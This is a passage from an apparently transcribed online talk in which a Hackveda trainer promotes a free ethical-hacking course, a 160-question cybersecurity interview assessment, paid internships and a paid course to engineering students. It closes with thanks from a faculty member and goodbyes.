Then you should have the understanding of network protocols, you should have understanding of operating systems, you should have understanding of firewalls, intrusion detection and prevention systems, as well as you should have good communication skills. So these are some of the requirements, basic requirements, which companies have when it comes to take a cybersecurity, to become a cybersecurity professional. Okay. So there are a lot of options available on Hackveda's platform for which you can train yourself. Okay. And become a cybersecurity professional. And one thing which I really want to share with you all, so you can reach out to the platform. I have already shared the free registration link with you. And how can you become a cybersecurity professional or a Hackveda certified cybersecurity professional? So we have a section known as interview preparation. Being into college, what you can do, you can apply as paid interns with us. For paid internship, what do you need to do? You need to pass the cybersecurity interview preparation test, assessment test, and you have to become a Hackveda certified professional. The certification is free of cost once you answer all of these questions. Okay. Which means there are questions like, how is encryption different from hashing? What are the response codes that can be received from a web application? So first, you can get trained using the ethical hacking course. This is a free course. Okay. It's a self-learning course. You can learn it at your own pace. Once you're done implementation with the course, you can take this assessment test where certain questions will be asked from you. Okay. And as soon as you answer all those questions, you become a Hackveda certified professional. Okay. And I'll show you on the platform. It's a competitive platform. And over the platform, the candidates, those who are taking their assessments, you can quickly see that these are the candidates. So there is a candidate known as Harshit Bhardwaj. He is currently overall ranking 3 on the platform, where he attempted 30 questions on cybersecurity interview quiz. And totally, there are 160 questions in the cybersecurity interview quiz. So once you take that assessment, once you answer all these 160 questions, it is not necessary that you do it in one day. You can attempt 10 questions per day, and you can answer all these 116 questions in like 16 to 20 days, and you become a Hackveda certified professional with a certificate accredited from American National Accreditation Board. Okay. And what we are doing with the candidates, so the candidates, those who are taking these assessment tests, working on their knowledge on cybersecurity, we are introducing them with the industry so that they get the better hiring opportunities in India as well as international. So being a workforce development organization, we are building this talent, we are assessing this talent, and we are taking this talent to the industry so that industry can hire them and they can practically work on great opportunities. Okay. And in order to help that, we also hire paid interns. So once you are done with the course, free self-learning course on Hackveda 1-to-1, once you are done with the assessment test, and as soon as you get the certificate from Hackveda's platform for Hackveda certified professional, you are eligible for the paid internships with Hackveda, where Hackveda pay the stipends from 5,000 rupees to 15,000 rupees per month, depending on the kind of projects which we are working and the kind of projects which we are currently working in the cybersecurity. I would also like to quickly show you. So this is the current project which we are doing. In this project, So this project is worth approximately 1 crore rupees. It's a 89 lakh, approximately 89 lakh rupees project. What we are doing, we are developing a toolkit and framework for validation of OS integrity and patching. Okay. And what are we building in this software? We are building a toolkit and a framework for validation of Android operating system integrity and patching. And it includes software patch security testing suite. This will be built into a high-end workstation for static, dynamic, interactive, fuzz, and binary patch analysis. Okay, so we do a lot of things in this, the patch behavior, the path tracing, API tracing. So it's a large project where we are dealing with a lot of vulnerabilities which are available on Android, and the vulnerability list is defined on the left hand side of this page, where we are working on denial of service, bypass, execution of the code, memory corruption, XSS attacks, information gaining attacks. Okay, and in order to show you, this is the complete flow with which we are building the product. And just to show you the kind of cybersecurity products and what is the worth of becoming a cybersecurity professional. So you can see that. So we have to build the software in approximately 50 lakh rupees. And then we have to manage and upgrade the project for another, 50 lakh rupees. And this is a project of 1 to 3 years, where the development, the overall value is approximately 85 lakh rupees. And Hackveda is doing a lot of projects like this. Okay, so what do you get? You get the opportunity, if you get trained on Hackveda 1-to-1, you get the opportunity to work with Hackveda, you as a paid intern on the projects like this, and you get the opportunity to work with the international hiring partners on a very high profile as a cybersecurity professional. Okay, so guys, I believe we are clear, and I have already shared the information with you. Also, once you will register, you're going to get a video where the complete process is explained and how to take the assessment test. That video I'm sharing with you, how to take assessment test with Hackveda. So that video also I'm sharing with you. Let me just quickly go here. And section we will discuss how to take assessment examinations on Hackveda 1-to-1 platform. Okay, so how can you become eligible? So you can take instructions on how to take assessment test. How to take assessment test. Okay, so this link has also been shared with you all in the chat. So you can take the assessment test, start the competition. The assessment tests are very nice because you don't need to be, you don't need to worry about what should be the correct answer and how you should approach. So once you log into 1-to-1, I'm going to quickly show you how you can quickly get assessed also. So once you log into your account, let me just log into my account. Just allow me a minute. So once you register, you're going to get a password on your email ID. And once you log in, okay, you will get access to the cybersecurity interview preparation. Now, once you click on cybersecurity interview preparation, you're going to get the assessment test. We have the assessment test instructions here also. You can quickly take the assessment test instruction. And after watching the assessment test instruction, you can start the assessment test. Once you start the assessment test, I'll quickly show you. You can quickly go next. And the assessment test has around 160 exams. And it's not necessary that you need to take all the questions in one go. You can take a few answers and then you can attempt again. And you can resume your test by clicking on OK. Okay. So once you click on OK, you will be on the question where you have kept it at the last. Okay. Now, so let's say the first question is, how is encryption different from hashing? And suppose you don't know. Okay. So we have the help option available here. There is a hint option available. You can click on view hint. And there you will get the kind of answer which needs to be given in order to learn out of it. So here it says Both encryption and hashing are used to convert readable data into an unreadable format. The difference is that the encrypted data can be converted back to original data by the process of decryption, but the hash data cannot be converted back to the original data. Okay, so this platform helps you in preparation of the interview. So what can you do? You can answer in this format. So you can say both encryption and hashing helps in converting readable data into unreadable data. The difference is encrypted data can be decrypted, but hashed data cannot. Okay, like that. So I have made an answer, and once I click on next, so this answer will be submitted and I'm going to get a response. So I got an okay response, which means my answer is correct and it was an average answer. So we have a lot of categories of answers, and this platform records your interview. So you can turn your cam on, in fact. Okay, and once you turn your cam on, your interview can be recorded here. So you can take those interviews, and once your interview gets recorded over here, you can stop your interview. It will be saved on our platform, and then we can use your interview in order to share this information with the hiring partners. Okay, now once it is done, once you are done with your assessment test, finally we are going to get the results. And once you have given all your answers, so you are going to reach out to the final page, where if your exam status is pass, once you have answered all the questions and if your exam status is pass, you will be able to click on generate certificate, and you're going to get the certificate generated. And the certificate will be of Hackweda Certified Professional for Cybersecurity. Okay. Also, the current students, those who are taking this course, is Harshit Bhardwaj, Arth Doshi, those who have taken the assessment exams as of now. Okay. So you can start taking the assessment exams. You can start preparing from Hackweda one-to-one videos, which is recorded in the session format, and you can get a lot of information on cybersecurity. So guys, that was all which we had to cover. So approximately, we took approximately 30 minutes extra, but I think it would be very, very useful for you in order to build your career as a cybersecurity professional. Also, we do have the professional training programs available on cybersecurity, which is not much costly. It's only 11,800 rupees, inclusive of all taxes, which is a 3-month course on cybersecurity available online, taught by industry professionals like me, those who practically teach, the ethical hacking and the cybersecurity mobile hacking part. So you can also take this opportunity to learn with us in the instructor-led online format. We organize these trainings on Monday to Friday in the evening time, after 7 p.m. or 8 p.m. in the evening online. So you can learn from us, practically understand cybersecurity with a lot of practical knowledge, and start building your career in cybersecurity. So guys, if you have any questions, you can feel free to ask your questions if anybody has any questions. And Tanun sir, if you also have any question, feel free to ask me. If you guys want to reach out to us, on the slide we have that information, the contact information and everything which you need to know from Hackweda.
Any questions from the students, please?
Any questions from the students?
Okay, I think, sir, it was a really nice session. I, on behalf of CSE Department of ITS Engineering College, really, what you can say, thank you for accepting our invitation as such a short notice, and giving our students such a wonderful demonstration and elaboration of the concepts related to cybersecurity and attacks and hacking and various other industry related points which they should keep in mind from the perspective of pursuing their career in this particular domain. So thank you once again, sir. And it was really nice to have you and what you can say, guide our students with such a deep knowledge in this domain of cybersecurity. Thank you, sir.
Thank you, sir. Thank you. And I request if all the candidates can turn their cams on for a moment. Let's have a picture. Let's have a picture together.
All of you, please kindly switch on your camera, please.
Right.
Of course, some of the students, I think they have felt hungry and they have left.
maybe, sir. Maybe.
Because
Definitely.
they have their own, in the hostel also, they have their own.
They have their fixed lunchtime. Yes. I'm sorry that we extended the session a little
What
more.
an issue, sir. You have given such a wonderful demonstration of the concepts and what you can say, the elaborated things with a practical demonstration also. It was such a wonderful session.
Right. So thank you, everyone. Thank you, all the participants. Thank you, Tarun sir, for inviting and for having me here. And I'm very thankful to ITS College for having us. And very soon, let's say we will definitely meet at the campus when things are fine. And till then,
I'll certainly try to arrange a session offline so that other students, they can be benefited. Of course, this was a off day for the faculty and the students. So because of that, also the strength was a bit less. Of course, I hope more students will be joining. Okay, thank you, sir. Thank you once again. Sir.
Thank you so much. Thank you so much. Thank you so much, everyone. Take care and have a great career ahead.
Thank you to you students also. Okay.